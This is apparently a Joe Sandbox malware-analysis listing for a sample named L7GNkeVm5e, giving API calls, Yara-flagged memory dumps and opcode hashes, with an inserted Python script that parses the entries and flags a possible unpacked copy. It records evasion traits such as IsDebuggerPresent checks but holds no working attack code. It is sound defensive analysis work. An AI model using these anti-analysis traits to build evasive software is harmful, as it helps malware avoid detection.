Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
• String ID:
• API String ID: 2444527052-0
• Opcode ID: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
• Instruction ID: 0696757347486699991afdae1c367ad9a815ca2b39bc809b388401715a4d6b3e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1611871600206AADB24AB75DC46BBB73A8EF0D340F14146FFA15D7281EB7CE95087E9
APIs
  • Part of subcall function 02132131: GetLastError.KERNEL32(?,?,0212A9DC,?,00000000,?,0212CDD6,02102474,00000000,?,00451F20), ref: 02132135
  • Part of subcall function 02132131: _free.LIBCMT ref: 02132168
  • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321A9
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02130A13,?,?,?,?,0213046A,?,00000004), ref: 0213B343
• _wcschr.LIBVCRUNTIME ref: 0213B3D3
• _wcschr.LIBVCRUNTIME ref: 0213B3E1
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,02130A13,00000000,02130B33), ref: 0213B484
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
• String ID:
• API String ID: 2444527052-0
• Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
• Instruction ID: c669f00a155aee469c3c71a60ab2258ec629f66d224e6756a9958601d9631abf
• Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
• Instruction Fuzzy Hash: 8761E971A84205AED726AF74CC41BAB739BEF04718F14443AE916D7180FB74DA00CB64
APIs
  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B439
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B48A
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B54A
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ErrorInfoLastLocale$_free
• String ID:
• API String ID: 2834031935-0
• Opcode ID: caee69047279a6347e873e3f4e2a46e9bba25e4d94b1d1d1a57b8ed79edba979
• Instruction ID: f1e76511527bd8b46bed2dc81967877e1a53036e4ad42a1ad25ba8e4a7fcb861
• Opcode Fuzzy Hash: caee69047279a6347e873e3f4e2a46e9bba25e4d94b1d1d1a57b8ed79edba979
• Instruction Fuzzy Hash: 2461A571500207ABEF289F25CC82BBA77A8EF08318F10507BEE15C6681E73DD951CB99
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4BB
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4C5
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4D2
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
• Instruction ID: 026f9f506817a9816d6037b847677398505f2b74d93b69b13e61bf99ecfd2c2c
• Opcode Fuzzy Hash: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
• Instruction Fuzzy Hash: BC31D8749012289BCB21DF24D9887CDBBB4AF08711F5041EAE81CA7250EB749F958F49
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0210DACD), ref: 0212A722
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0210DACD), ref: 0212A72C
• UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0210DACD), ref: 0212A739
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
• Instruction ID: 25eca4c6d37eede6604f3aa2b2338e4564030a655d5d1e682d158201341b96c0
• Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
• Instruction Fuzzy Hash: 9631D874D4122C9BCB21DF64DD8879CBBB8BF08710F5042EAE80CA7290E7749B958F48
APIs
• GetCurrentProcess.KERNEL32(00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000,?,0042DFAF,00000003), ref: 0042FE70
• TerminateProcess.KERNEL32(00000000,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000,?,0042DFAF,00000003), ref: 0042FE77
• ExitProcess.KERNEL32 ref: 0042FE89
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
• Instruction ID: cbe936bc43631a6ebab221667e08f429fe6a913ec22d428f2decb57a07c45d03
• Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
• Instruction Fuzzy Hash: F9E08C31100548AFCF126F60ED09A5A3B39FF11B86F850479F8068B276CB39EE42CB48
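The entries above are easier to reason about as records than as bullets: the same API ID recurs once in the PE-backed dump at 0x400000 and once in the dump at 0x02100000 that is not PE-backed and carries Yara matches, with matching API String IDs but different Instruction Fuzzy Hashes. The following Python is an added example written for this page, not part of the Joe Sandbox report. It parses a constructed excerpt made of the two IsDebuggerPresent entries listed above, pairs functions across dumps by API String ID, and flags pairs that exist both in a PE-backed region and in a non-PE-backed region (the relocated, unpacked copy; this reading follows from "based on PE: false" plus the Yara matches and is the editor's interpretation, not a field the report emits). The `looks_like_crt_fastfail` check encodes the editor's own caveat that the IsDebuggerPresent -> SetUnhandledExceptionFilter -> UnhandledExceptionFilter triad is the shape of the MSVC runtime's crash-reporting helper and is therefore weak evidence of deliberate anti-debugging on its own; the report makes no such claim.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed excerpt: the two IsDebuggerPresent entries from this report, copied verbatim
# so the script runs offline. Any other Joe Sandbox "APIs" listing has the same shape.
EXCERPT = """\
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4BB
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4C5
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4D2
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
• Instruction ID: 026f9f506817a9816d6037b847677398505f2b74d93b69b13e61bf99ecfd2c2c
• Opcode Fuzzy Hash: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
• Instruction Fuzzy Hash: BC31D8749012289BCB21DF24D9887CDBBB4AF08711F5041EAE81CA7250EB749F958F49
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0210DACD), ref: 0212A722
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0210DACD), ref: 0212A72C
• UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0210DACD), ref: 0212A739
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
• Instruction ID: 25eca4c6d37eede6604f3aa2b2338e4564030a655d5d1e682d158201341b96c0
• Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
• Instruction Fuzzy Hash: 9631D874D4122C9BCB21DF64DD8879CBBB8BF08710F5042EAE80CA7290E7749B958F48
"""

@dataclass
class ApiCall:
    name: str
    module: str
    ref: int                      # address of the call site, parsed from "ref: ..."
    subcall_of: Optional[str]     # callee address when marked "Part of subcall function"

@dataclass
class Function:
    apis: list = field(default_factory=list)
    source_file: str = ""
    offset: int = 0               # base of the memory dump the function was found in
    pe_backed: bool = False       # "based on PE: true/false"
    yara: bool = False            # a "Yara matches" line was present for this dump
    api_id: str = ""
    api_string_id: str = ""
    opcode_id: str = ""
    instruction_fuzzy_hash: str = ""

API_RE = re.compile(r"^•\s+(?:Part of subcall function ([0-9A-Fa-f]+):\s+)?(\w+)\.(\w+)(?:\(.*\))?,?\s+ref:\s+([0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^•\s+Source File:\s+(\S+),\s+Offset:\s+([0-9A-Fa-f]+),\s+based on PE:\s+(true|false)$")
KV_RE = re.compile(r"^•\s+(API ID|API String ID|Opcode ID|Instruction Fuzzy Hash):\s*(.*)$")

def parse_functions(text):
    """Split the listing at each "APIs" header and collect one Function per block."""
    funcs, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = Function()
            funcs.append(cur)
            continue
        if cur is None:
            continue
        if line == "Yara matches":
            cur.yara = True
            continue
        if (m := API_RE.match(line)):
            cur.apis.append(ApiCall(m.group(2), m.group(3), int(m.group(4), 16), m.group(1)))
        elif (m := SRC_RE.match(line)):
            cur.source_file, cur.offset, cur.pe_backed = m.group(1), int(m.group(2), 16), m.group(3) == "true"
        elif (m := KV_RE.match(line)):
            setattr(cur, m.group(1).lower().replace(" ", "_"), m.group(2))
    return funcs

def relocated_copies(funcs):
    """API String IDs seen both in a PE-backed dump and in a non-PE-backed dump,
    i.e. code that also exists as a relocated copy outside the mapped image."""
    groups = {}
    for f in funcs:
        groups.setdefault(f.api_string_id, []).append(f)
    out = []
    for sid, members in groups.items():
        pe = sorted(m.offset for m in members if m.pe_backed)
        non_pe = sorted(m.offset for m in members if not m.pe_backed)
        if pe and non_pe:
            out.append((sid, pe, non_pe))
    return out

CRT_FASTFAIL_SEQUENCE = ("IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter")

def looks_like_crt_fastfail(func):
    """Editor's heuristic: a function whose own (non-subcall) calls are exactly this
    triad has the shape of the MSVC runtime's crash-reporting helper, so treat the
    IsDebuggerPresent hit as weak anti-debug evidence until the caller is examined."""
    own = tuple(a.name for a in func.apis if a.subcall_of is None)
    return own == CRT_FASTFAIL_SEQUENCE

if __name__ == "__main__":
    funcs = parse_functions(EXCERPT)
    for sid, pe, non_pe in relocated_copies(funcs):
        print(f"API String ID {sid}: PE-backed at {[hex(o) for o in pe]}, relocated copy at {[hex(o) for o in non_pe]}")
    for f in funcs:
        verdict = "CRT crash-report shape" if looks_like_crt_fastfail(f) else "custom sequence"
        print(f"{f.offset:#x} yara={f.yara} {verdict} fuzzy={f.instruction_fuzzy_hash[:8]}")
```

The pairing key is the API String ID rather than the fuzzy hash on purpose: the two copies share it while their Instruction Fuzzy Hashes differ, which is exactly what relocated code with patched absolute operands looks like, and it is the Opcode ID or fuzzy hash, not the API ID, that you would carry into a hunt for the same routine in other samples.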
APIs
• GetCurrentProcess.KERNEL32(00000000,?,0213008C,00000000,00457970,0000000C,021301E3,00000000,00000002,00000000), ref: 021300D7
• TerminateProcess.KERNEL32(00000000,?,0213008C,00000000,00457970,0000000C,021301E3,00000000,00000002,00000000), ref: 021300DE
• ExitProcess.KERNEL32 ref: 021300F0
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                  • Instruction ID: 46d7942e644f02f464d1db77dca0f3f9e2f38e690f8b820e85f2d1f1f21e9d64
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5E0B635040648AFCF126F64DD08A597BABFB49B86F404064FA099B521CB36DE42CA84
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                  • API String ID: 0-2784972518
                                                                                                                                                                                                                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                  • Instruction ID: 8d3964254565dfb7a40da2e234806515813b4f54de45dc01fec139ea16ba0e7d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 573148B6900609DFDB10CF99C880BAEBBF9FF48324F15404AD845A7250D7B1EA45CBA4
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: /
                                                                                                                                                                                                                                                  • API String ID: 0-2043925204
                                                                                                                                                                                                                                                  • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                                                  • Instruction ID: 3adc650e711776362111ab5e43553b3f0cbdd7ddf1b9c00206e195fcc59ee936
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB414B725003196FCB20AFB9DC49EBBB778EB88314F10026EF915D7281EA749D41CB58
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: /
                                                                                                                                                                                                                                                  • API String ID: 0-2043925204
                                                                                                                                                                                                                                                  • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                                  • Instruction ID: b8d655e70eeb330501067c5e118c119985ca0b9e8e61f661c5c8d206a063268c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0411572940218AFCB249FB9DC48EAB77BAEF80714F104269F915DB180E7719D85CB50
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430203,?,00000004), ref: 00435203
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                  • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                                  • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                                  • Opcode ID: cb6fe6aba531d19615e9b09a8e77e06eed824ebb7129d9e125764b32f0a2e06d
                                                                                                                                                                                                                                                  • Instruction ID: 77d2a6705551c22c9c4f0428a2f6e8a78b6e695a94441c88a724e02477ae1ec3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb6fe6aba531d19615e9b09a8e77e06eed824ebb7129d9e125764b32f0a2e06d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3F09631A81318BBDF116F51DC02FAE7B65EF18B12F10416AFC0567290DA769920AA9D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 47af0fffafc6034098a66fb6813f004731177b6d1efb7719fab4c4e099b30d71
                                                                                                                                                                                                                                                  • Instruction ID: 3e9e42cc23dfcbd4fdb8553ee609b72eaaad40ee2fbbc40375509bb09f17fb16
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47af0fffafc6034098a66fb6813f004731177b6d1efb7719fab4c4e099b30d71
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B024D71E002299BDF14CFAAD9806AEFBF1EF48314F55416AD919E7340D734AD41CB94
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
                                                                                                                                                                                                                                                  • Instruction ID: 9d78a679d83420df9935adb36ce5761b86d0da00fcd57b71cd5a430588871da8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4023D71E402299FDF14CFA9D8806ADB7F2FF48314F258269E919E7380D731A956CB84
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 02102622
                                                                                                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 021027C0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: MessageNtdllPostProc_QuitWindow
                                                                                                                                                                                                                                                  • String ID:
• API String ID: 4264772764-0
• Opcode ID: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
• Instruction ID: 0022d485b25b8a3154d87a3368ef0b702b23adb1b69aa6f224ac129889ce3af6
• Opcode Fuzzy Hash: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
• Instruction Fuzzy Hash: 3D410D25964384A9E731EFA5FC45B2533B0FF64722F10652BE528CB2B2E3B28544C75E
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CAA,?,?,00000008,?,?,0043F16B,00000000), ref: 00436EDC
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
• Instruction ID: 4bead90866a6a8306652f63e3edf2d2e70f9049ab2994a866b46465668e927e2
• Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
• Instruction Fuzzy Hash: 13B15D35210609EFD715CF28C48AB657BE0FF09364F26D659E899CF2A1C339E992CB44
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02136F11,?,?,00000008,?,?,0213F3D2,00000000), ref: 02137143
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
• Instruction ID: cffc319faa3c0f2dd6dfe7a5f2b0bc894f3464264b698f24eb57c6e9028cfd50
• Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
• Instruction Fuzzy Hash: ACB15E72150608DFD71ACF28C486B65BBE2FF45368F258658E899CF2E5C335E982CB40
APIs
  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B689
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ErrorLast$_free$InfoLocale
• String ID:
• API String ID: 2955987475-0
• Opcode ID: 76bdead3310ffb9b1966938f0108c5245838f754ae1b95c719928bdd6cdfccfe
• Instruction ID: 4c7343574116d105162f1c568ba8aea657e897f65ebfc7aca9760b93b0bda93a
• Opcode Fuzzy Hash: 76bdead3310ffb9b1966938f0108c5245838f754ae1b95c719928bdd6cdfccfe
• Instruction Fuzzy Hash: AA21863251020A9BDB249E26DC46BBB73A8EB48315F10117FFE01D6242EB79DD45CB99
APIs
  • Part of subcall function 02132131: GetLastError.KERNEL32(?,?,0212A9DC,?,00000000,?,0212CDD6,02102474,00000000,?,00451F20), ref: 02132135
  • Part of subcall function 02132131: _free.LIBCMT ref: 02132168
  • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321A9
  • Part of subcall function 02132131: _free.LIBCMT ref: 02132190
  • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0213219D
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0213B8F0
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$InfoLocale
• String ID:
• API String ID: 2955987475-0
• Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
• Instruction ID: 12912561c9ea73806aeaa9abdda694249cd269c87e7e7d5242dd94c8d6dacdcb
• Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
• Instruction Fuzzy Hash: 0B21657259420A9FDF269F25DC41BBA77AEEF44718F10017AEE01D6140FB799A44CB50
APIs
  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
• EnumSystemLocalesW.KERNEL32(0043B3E5,00000001,00000000,?,004307A5,?,0043BA12,00000000,?,?,?), ref: 0043B32F
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_free
• String ID:
• API String ID: 2016158738-0
• Opcode ID: 9dfe4f960725340af2dbd28f6025354d562524789b7736a7d15e08a761a9ce4d
• Instruction ID: 9dc9256a404de3575a93206041da1aaaa21de42e5a9a86f68168da1acedf184b
• Opcode Fuzzy Hash: 9dfe4f960725340af2dbd28f6025354d562524789b7736a7d15e08a761a9ce4d
• Instruction Fuzzy Hash: 6E1129372007019FDB189F39C89577BB791FF88318F15452EEA8687B40E3756902C784
APIs
  • Part of subcall function 02132131: GetLastError.KERNEL32(?,?,0212A9DC,?,00000000,?,0212CDD6,02102474,00000000,?,00451F20), ref: 02132135
  • Part of subcall function 02132131: _free.LIBCMT ref: 02132168
  • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321A9
• EnumSystemLocalesW.KERNEL32(0043B3E5,00000001,00000000,?,02130A0C,?,0213BC79,00000000,?,?,?), ref: 0213B596
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
